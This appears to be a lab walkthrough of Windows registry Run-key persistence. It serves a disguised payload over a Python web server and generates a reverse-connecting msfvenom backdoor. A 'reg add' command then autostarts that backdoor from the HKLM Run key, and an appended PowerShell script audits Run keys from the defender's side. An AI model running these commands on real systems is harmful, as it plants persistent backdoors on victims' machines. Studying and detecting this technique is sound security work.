
Registry Run Key Persistence


Warning
Everything shown here is carried out in a virtualized environment hosted on my local machine.

What is a registry?

The registry is a hierarchical database that stores configuration information about the Windows system and its applications, as shown in the picture below.


Components

Hives

You can think of hives as a way of categorizing information. There are 5 hives.

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

Contains information about the currently logged-on user.

HKEY_LOCAL_MACHINE

Contains information about the computer system.

HKEY_USERS

HKEY_CURRENT_CONFIG

What is a Run Key?

The Run key is a registry key whose entries are executed when a user logs into the system. What we are going to do is add a value inside the Run key and point it at our backdoor/malware so that it runs every time a user logs in.

The Run key is located at:

Under HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

Under HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

Hands on

The only tools I'm going to use are Metasploit and msfvenom. I have already created a malicious payload to infect the host. The malicious payload is called svch0st.exe. What I'm going to do is set up an HTTP web server to distribute the malicious payload to the victim machine.

Command
python3 -m http.server 9000


Next, we are going to set up the listener and execute the malicious payload.


Below, we can see that svch0st.exe (the malicious payload) is running and we have established a connection to the victim computer.


The next thing on the list is generating our backdoor using msfvenom. So, let's open another shell.

To generate a payload, we're going to use the following command structure:

msfvenom -p payload LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f format > name.exe


Then, we're going to use meterpreter to upload the backdoor (evilLink.exe) to the victim machine. Don't forget to escape the backslashes in the Windows path.


Currently, we're inside svch0st.exe, which is a 32-bit application. If we modify the registry of a 64-bit computer while we are in a 32-bit application, registry redirection will place our changes under:

HKEY_LOCAL_MACHINE\Software\Wow6432Node



The solution is to move to a 64-bit application (process) and then modify the registry.




Now, we're going to open a command line inside meterpreter using the "shell" command and add a value to the registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run. This entry will execute the backdoor whenever the system boots up or reboots and a user logs in.


Structure of the command:
Command
reg add RegistryPath /v ValueName /t ValueType /d PATH_TO_PAYLOAD /f
This command tells the system to automatically run the program at startup.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d "C:\Windows\Temp\evilLink.exe" /f


Now that we have added the value to the registry, let's reboot the victim machine and see if our registry entry works.


While that is taking place, let's set up a listener on port 7777.

Boom, the victim machine automatically started the backdoor.
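To check for this kind of persistence from the defender's side, here is an added PowerShell audit script (not part of the original walkthrough) that lists every value in the HKCU and HKLM Run/RunOnce keys named above, including the Wow6432Node view that a 32-bit process is redirected to, and flags entries that launch from a temp or public directory, are not validly signed, or point at a file that no longer exists. The directory list and the flagging rules are my own assumptions and should be tuned per environment; run it from 64-bit PowerShell so the HKLM paths are not themselves redirected.

```powershell
# Added example: inventory Run/RunOnce autostart entries and flag suspicious ones.
# Covers both the native view and the Wow6432Node view written by 32-bit processes.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumption: legitimate autostart binaries rarely live in these directories.
$suspiciousDirs = @('\Windows\Temp\', '\AppData\Local\Temp\', '\Users\Public\')

function Get-RunKeyEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item $key
        foreach ($name in $item.GetValueNames()) {
            $cmd = [string]$item.GetValue($name)
            # Extract the executable: a quoted path, or else the first whitespace-delimited token.
            if ($cmd -match '^"([^"]+)"') { $exe = $Matches[1] } else { $exe = ($cmd -split '\s+')[0] }
            $flags = @()
            foreach ($d in $suspiciousDirs) {
                if ($exe -like "*$d*") { $flags += 'temp-or-public-dir' }
            }
            if (Test-Path -LiteralPath $exe) {
                $sig = Get-AuthenticodeSignature -FilePath $exe
                if ($sig.Status -ne 'Valid') { $flags += "signature:$($sig.Status)" }
            } else {
                $flags += 'target-missing'
            }
            [PSCustomObject]@{
                Key     = $key
                Name    = $name
                Command = $cmd
                Flags   = ($flags -join ',')
            }
        }
    }
}

# An entry such as the one added in this post (value "backdoor" pointing at
# C:\Windows\Temp\evilLink.exe) would be reported with Flags "temp-or-public-dir,signature:NotSigned".
Get-RunKeyEntries | Format-Table -AutoSize -Wrap
```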